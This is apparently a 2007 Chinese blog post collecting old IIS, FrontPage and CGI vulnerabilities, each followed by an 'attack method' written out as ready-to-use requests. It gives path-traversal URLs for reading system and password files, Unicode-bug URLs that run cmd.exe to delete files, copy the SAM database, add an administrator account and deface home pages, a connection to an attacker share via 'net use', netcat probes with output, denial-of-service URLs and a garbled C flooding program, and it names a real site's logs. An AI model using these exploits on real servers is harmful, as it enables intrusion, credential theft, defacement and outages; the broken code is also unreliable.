一些老的经典的漏洞收集

原创 2007年09月13日 19:58:00
☆carbo.dll☆
iCat Carbo服务器一个网络购物程序,它被 PC杂评为最好的网络购物软件.安全专家Mikael Johansson发现 iCat Carbo服务器版本 3.0.0.中存在一个漏洞,这个漏洞让我们每个人查看系统中的任何文件在(除文件之外和一些特殊字符).
攻击方法:

提交这样的http请求 :
http://host/carbo.dll?icatcommand=file_to_view&catalogname=catalog 

http会做如下回应:
[iCat Carbo Server (ISAPI, Release) Version 3.0.0 Release Build 244]

Error: (-1007) cannot open file 'C:/web/carbohome/file_to_view.htm'

查看win.ini文件: c:/winnt/win.ini:

http://host/carbo.dll?icatcommand=../../winnt/win.ini&catalogname=catalog 
___________________________________________________________________________
☆uploader.exe☆

如果您使用NT作为您的WebServer的操作系统,入侵者能够利用uploader.exe上传任何文件。
攻击方法: http://host/cgi-win/uploader.exe 
会带你到上传页面,剩下的事就不用我告诉你了把?:)
___________________________________________________________________________
☆search97.vts☆

这个文件将能使入侵者任意的读取你系统中启动httpd用户能读取的文件。
攻击方法: http://www.xxx.com/search97.vts 
?HLNavigate=On&querytext=dcm
&ServerKey=Primary
&ResultTemplate=../../../../../../../etc/passwd
&ResultStyle=simple
&ResultCount=20
&collection=books
___________________________________________________________________________
☆newdsn.exe☆

个存在于/scripts/tools目录下的newdsn.exe文件允许任何一个用户在web根目录下创建任何文件。另外,在某些特定条件下,利用newdsn.exe可能使IIS遭受拒绝服务攻击,如果攻击成功,将导致IIS停止响应连接请求。
攻击方法:
1. 创建文件:http://xxx.xxx.xxx.xxx/scripts/tools/newdsn.exe?driver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=Evil2+samples+from+microsoft&dbq=..%2F..%2Fwwwroot%2Fevil2.htm&newdb=CREATE_DB&attr= 
2. D.o.s攻击:提交下列连接请求:
http://www.example.com/Scripts/Tools/Newdsn.exe?Createdatabase 

如果IIS是有问题的版本,浏览器将不会显示任何信息。当下列两种情况中的任意一种发生时,都会导致拒绝服务:

- 重新启动WWW服务时: 这将导致IIS挂起。不能重新启动WWW服务,总是显示"端口已经被占用"的错误信息。
- 停止WWW服务: IIS将会停止 。但是IIS的数据库部分并没有死掉,仍然会响应80端口发来的请求,因此,如果再次提交一个请求: http://www.example.com/Scripts/Tools/Newdsn.exe?Createdatabase 
IIS会产生保护性错误。
___________________________________________________________________________
☆service.pwd☆

http://www.hostname.com/_vti_pvt/service.pwd可读,将暴露用户密码信息. 
攻击方法:
访问http://host/_vti_pvt/service.pwd  [service.pwd]正是所需要的密码文件,如果我们粗心的网管没有设置权限的话,那浏览器就会显示出对方的密码文件。

___________________________________________________________________________
☆users.pwd☆

UNix系统的http://www.hostname.com/_vti_pvt/users.pwd可读,将暴露用户密码信息。 
攻击方法:
访问http://www.hostname.com/_vti_pvt/users.pwd。 

___________________________________________________________________________
☆authors.pwd☆

UNix系统的http://www.hostname.com/_vti_pvt/authors.pwd可读,将暴露用户密码信息。 
攻击方法:
访问http://www.hostname.com/_vti_pvt/authors.pwd。 
___________________________________________________________________________
☆administrators.pwd☆

UNix系统的http://www.hostname.com/_vti_pvt/administrators.pwd可读,将暴露用户密码信息。 
攻击方法:
访问http://www.hostname.com/_vti_pvt/administrators.pwd。 

___________________________________________________________________________
☆shtml.dll☆

在Frontpage Extention Server/Windows2000 Server上输入一个不存在的文件将可以得到web目录的本地路径信息. 但是如果我们请求并非HTML、SHTML或者ASP后缀的文件,我们将会得到不同的信息. <a href="http://TrustedServer/_vti_bin/shtml.dll/Hostile  Code Here">http://TrustedServer</a>如果用户点击上述指定的链接,脚本将通过HTTP请求从客户端传送给可信任的站点,可信任站点然后将该脚本作为错误信息的一部分返回给客户端。客户端在收到包含该脚本的出错页面时,将执行该脚本,并将赋予来自可信任站点的内容的所有权力赋予该脚本。另外,shtml.dll对较长的带html后缀的文件名都会进行识别和处理,利用这一点,可以对IIS服务器执行DOS攻击,以下这个程序,能使目标服务器的CPU占用率达到  100%,并且耗用所有的应用程序日志空间。系统在数分钟内会报告应用程序日志已满。
攻击方法:
1. 暴露路径:http://www.victim.com/_vti_bin/shtml.dll/something.html 
这样将返回以下信息:
Cannot open "d:/inetpub/wwwroot/postinfo1.html": no such file or folder.
2. 可信任站点执行脚本:使用如下格式的URL:
serv_addr.sin_family =AF_INET;
serv_addr.sin_addr.s_addr = inet_addr("192.168.0.131";
serv_addr.sin_port = htons(80);

if ((sockfd =socket(AF_INET,SOCK_STREAM,0))<0)
{
printf("Create Socket faild /n";
return ;
}

if (connect(sockfd,(struct sockaddr*)&serv_addr,sizeof(serv_addr))<0)
{
printf("Connect faild /n";;
}
else
{
lLen = send ( sockfd,plusvuln,strlen(plusvuln),0 ;
for (lDo = 0 ;lDo < 7000;lDo ++)
{
lLen = send ( sockfd,"postinfdddddddddd",strlen("postinfdddddddddd",0) ;
if (lLen < 0 
{
printf("Send faild /n";
return;
}
}
lLen = send ( sockfd,"tzl.html HTTP/1.0/n/n",strlen("tzl.html HTTP/1.0/n/n" + 1,0) ;
//recv(sockfd,buffer,2000,0);
//printf(buffer);
//printf("/n";
}
closesocket(sockfd);
}


___________________________________________________________________________
☆shtml.exe☆

微软的 FrontPage Server Extensions存在一个远程拒绝服务漏洞,可能远程关闭一个web站点上的所有FrontPage操作。通过提交一个包含DOS设备名的链接, FrontPage Server Extensions就会挂起,不再响应后续的请求。为了恢复正常工作,必须重新启动IIS或者重新启动机器。
攻击方法:
提交这样的链接,都可能使FrontPage Server Extensions停止响应: http://www.example.com/_vti_bin/shtml.exe/com1.htm  http://www.example.com/_vti_bin/shtml.exe/prn.htm  http://www.example.com/_vti_bin/shtml.exe/aux.htm  http://www.example.com/_vti_bin/shtml.exe/prn.anything.here.htm  http://www.example.com/_vti_bin/shtml.exe/com1.asp  http://www.example.com/_vti_bin/shtml.exe/com1  .
___________________________________________________________________________
☆queryhit.htm☆

如果queryhit.htm提出一个搜索页面,那么你便可以搜索和观看这些文件。
攻击方法:
访问http://www.victim.com/samples/search/queryhit.htm  如果是搜索页面,然后在查找文件对话框里输入以下字符串:[#filename=*.pwd],如果屏幕上出现一长串连接到以[.pwd]为扩展名的密码文件的话,那就是所需要的东东了。
___________________________________________________________________________
☆Dotdotdot☆

vqServer及Sybase PowerDynamo网站服务器存在着一个老的攻击漏洞,此攻击是关于点点(..)的攻击,这是由于在WINDOW中允许连续的点被解释为级连的目录如'cd ...',解释为'cd ../..'.而Sybase PowerDynamo,老版本的vqServer允许远程攻击者绕过WEB安全系统横贯到其他目录。
攻击方法:
假如CONFIG.SYS存在在根目录下,就能读文件。 http://example.com/...................../config.sys 
列出根目录。 http://example.com/  /../../../../../../
___________________________________________________________________________
☆autoexec.bat☆

现在很多web服务器上存在这个安全问题,例如Jana Webserver,URL Live 1.0 webserver等.恶意的用户可能利用该漏洞来退出HTTP root目录,从而到达上层的目录树中.在URL中使用"../",攻击者们可以获得WEB SERVER有权读取的任何文件.
攻击方法: http://127.0.0.1:8080/../../../autoexec.bat  这样将读取畹统中的autoexec.bat文件
这个漏洞的利用还取决于系统目录的结构而定.
___________________________________________________________________________
☆achg.htr aexp.htr aexp2.htr aexp2b.htr aexp3.htr aexp4.htraexp4b.htr anot.htr anot3.htr☆

IIS4.0中包含一个有趣的特征就是允许远程用户攻击WEB服务器上的用户帐号,就是你的WEB服务器是通过NAT来转换地址的,还可以被攻击。每个IIS4.0安装的时候建立一个虚拟目录/iisadmpwd,这个目录包含多个.htr文件,匿名用户允许访问这些文件,这些文件刚好没有规定只限制在loopback addr(127.0.0.1),请求这些文件就跳出对话框让你通过WEB来修改用户的帐号和密码。这个目录物理映射在下面的目录下:
c:/winnt/system32/inetsrv/iisadmpwd
攻击方法:
访问:http://example.com/ iisadmpwd/*.htr的页面,并利用工具对其进行穷举。
___________________________________________________________________________
☆visadmin.exe☆

这个漏洞可以在服务器中一直产生临时文件知道服务器的硬盘慢了为止。任何人都可以远程的来完成。
使用使用在cgi-bin中默认的 visadmin.exe (Visitor Administrator)
攻击方法:
提交以下请求: http://www.targets.com/cgi-bin/visadmin.exe?user=guest 
___________________________________________________________________________
☆no-such-file.pl☆

这个漏洞会暴露其服务器上的路径,当你访问这个页面时会显示类似以下信息:
CGI Error
The specified CGI application misbehaved by not returning a complete set of
HTTP headers. The headers it did return are:
Can't open perl script "C:/InetPub/scripts/no-such-file.pl": No such file or
Directory
从此我们可以知道这个页面的物理路径为C:/InetPub/scripts/no-such-file.pl
攻击方法:
访问http://www.targets.com/cgi-bin/scripts/no-such-file.pl 
___________________________________________________________________________
☆?PageServices☆

这个是可以显示页面清单的!运气好的话还可以得到用户名和密码!(都是明文的)
方法是url/?PageServices 还可以这样试试
/?wp-cs-dump /?wp-ver-info /?wp-html-rend /?wp-usr-prop /?wp-ver-diff /?wp-verify-link /?wp-start-ver /?wp-stop-ver /?wp-uncheckout

___________________________________________________________________________
☆test-cgi☆

test-cgi同样是个常常出现的漏洞,在浏览器中输入:

http://thegnome.com/cgi-bin/test-cgi?/whatever 

将会返回:

CGI/1.0 test script report:

argc is 0. argv is .

SERVER_SOFTWARE = NCSA/1.4B
SERVER_NAME = thegnome.com
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/1.0
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT = text/plain, application/x-html, application/html,
text/html, text/x-html
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /cgi-bin/test-cgi
QUERY_STRING = whatever
REMOTE_HOST = fifth.column.gov
REMOTE_ADDR = 200.200.200.200
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =

再来一次,这样输入:

http://thegnome.com/ 


看到PASSWD了?

用netcat 80 端口 进行攻击:

machine% echo "GET /cgi-bin/test-cgi?/*" | nc removed.name.com 80

返回:

CGI/1.0 test script report:

argc is 1. argv is //*.

SERVER_SOFTWARE = NCSA/1.4.1
SERVER_NAME = removed.name.com
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/0.9
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT =
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /bin/cgi-bin/test-cgi
QUERY_STRING = /a /bin /boot /bsd /cdrom /dev /etc /home /lib /mnt
/root /sbin /stand /sys /tmp /usr /usr2 /var
REMOTE_HOST = remote.machine.com
REMOTE_ADDR = 255.255.255.255
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =

显示出了根目录!这样试试:

machine% echo "GET /cgi-bin/test-cgi?*" | nc removed.name.com 80

返回:

CGI/1.0 test script report:

argc is 1. argv is /*.

SERVER_SOFTWARE = NCSA/1.4.1
SERVER_NAME = removed.name.com
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/0.9
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT =
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /bin/cgi-bin/test-cgi
QUERY_STRING = calendar cgi-archie cgi-calendar cgi-date cgi-finger
cgi-fortune cgi-lib.pl imagemap imagemap.cgi imagemap.conf index.html
mail-query mail-query-2 majordomo majordomo.cf marker.cgi
menu message.cgi munger.cgi munger.note ncsa-default.tar post-query
query smartlist.cf src subscribe.cf test-cgi uptime
REMOTE_HOST = remote.machine.com
REMOTE_ADDR = 255.255.255.255
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =

显示了/CGI-BIN/目录下的东西

___________________________________________________________________________
☆unicode☆

列目录:
http://ip/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:/ 
http://www.victim.com/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:/ 

建立文件夹的命令
http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+md+c:/snowspider 

删除空的文件夹命令:
http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+rd+c:/snowspider 

删除文件的命令:
http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+del+c:/autoexec.bak 

Copy文件
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy%20c:/winnt/repair/sam._%20c:/inetpub/wwwroot/ 

NET USE的使用
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/net.exe?/c+use+i:+//myip/temp 

改CMD方法
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:/winnt/system32/cmd.exe+c:/inetpub/scripts/ccc.exe 
然后
http://xxx.xxx.xxx.xxx/scripts/ccc.exe?/c+echo+Hacked+by+chinese+>+f:/wwwroot/xxx/default.asp 

显示目标主机当前的环境变量
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+set 

FIND命令使用
比如我要查看WEB目录d:/inetpub/wwwroot下的所有asp、asa文件的内容:
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/find.exe?/n+/v+""+d:/inetpub/wwwroot/*.as* 

显示某一路径下相同文件类型的文件内容
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/find.exe?/n+/v+""+c:/inetpub/wwwroot/*.ht* 

添加用户命令
新建一个用户名为hacker密码为password的用户:
http://xxx.xxx.xxx.xxx/script/cmd.exe?/c%20c:/winnt/system32/net.exe%20user%20hacker%20password%20/add 

修改主页
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+Hacked+by+hacker+>+f:/wwwroot/xxx/default.asp 
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+12/1/2k+>>+f:/wwwroot/xxx/default.asp 
这样,主页就被更改成了:
Hacked by hacker
12/1/2k
关于更多的unicode漏洞可以在本论坛查找。

___________________________________________________________________________
☆_vti_inf.html☆
描述: web根目录下存在_vti_inf.html文件,该文件是Frontpage extention server的特征,包含了一系列Frontpage Extention Server的重要信息;而且Frontpage Extention server是一个有很多漏洞的web服务,用它入侵者可能直接修改首页文件,如果你读http://www.victim.com/_vti_inf.html你将得到FP  extensions的版本和它在服务器上的路径. 还有一些密码文件如:
http://www.victim.com/_vti_pvt/service.pwd 
http://www.victim.com/_vti_pvt/users.pwd 
http://www.victim.com/_vti_pvt/authors.pwd 
http://www.victim.com/_vti_pvt/administrators.pwd 

具体如何利用呢,我输入 www.hostname.com/_vti_inf.html ,然后查看
源文件,发现的东东如何利用?
解答:您可以先看看:http://www.shufe.edu.cn/ 
再看看:http://www.shufe.edu.cn/ xcb/Server/logs/access_log
Twwwscan是我用过最好的CGI漏洞扫描器之一,很多朋友也非常喜欢它。但最大的问题就是扫描出来的漏洞不知道要如何利用,所以我在网络上找到了twwwscan所有能扫描的漏洞的资料和攻击方法。希望对大家有所帮助。*/
 

相关文章推荐

2002-2006年系统经典利用漏洞:ipc$

  • 2016年01月22日 19:16
  • 10.39MB
  • 下载

几个比较经典的iis 漏洞.zip

  • 2008年06月15日 19:45
  • 7.43MB
  • 下载

动网论坛8.2经典注入漏洞利用

一、实验目的理解动网论坛8.2原理二、实验原理动网论坛用户登录过程中,过滤不严,导致注入,提升权限。漏洞存在源文件的login.asp中。三、实验环境本机:192.168.1.2 目标机:192.1...

经典漏洞合集整理备份

启航企业建站系统 cookie注入漏洞通杀所有版本 直接上exploit: javascript:alert(document.cookie="id="+escape("1 and 1=2...

漏洞挖掘方法之静态扫描+经典栈溢出实例

标 题: 漏洞挖掘方法之静态扫描+经典栈溢出实例 时 间: 2014-02-11,01:52:50 这是笔者公开发表的关于漏洞挖掘的第二篇文章,与发第一篇的时间差不多间隔了整整一年,在这一年里虽然工...

0day漏洞收集

  • 2013年07月08日 14:15
  • 39B
  • 下载

Android漏洞挖掘工具收集与整理

一、简介 小编最近查看了很多收集了android漏洞挖掘工具的网站,发现这些网站只给了名和链接,没有简介。这里就稍微扩充下,不仅收集了android各个漏洞挖掘工具,还给出了其简介、功能和参...

DNS域传送漏洞的收集、检测与利用

LandGrey DNS域传送漏洞的收集、检测与利用; nslookup nmap dig在Dns Zone Transfer漏洞上的使用; 提供多个批处理与利用脚本。...

php LFI漏洞的一些收集

1. LFI全称是local file include,先举个最简单的例子来说明下:
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:一些老的经典的漏洞收集
举报原因:
原因补充:

(最多只允许输入30个字)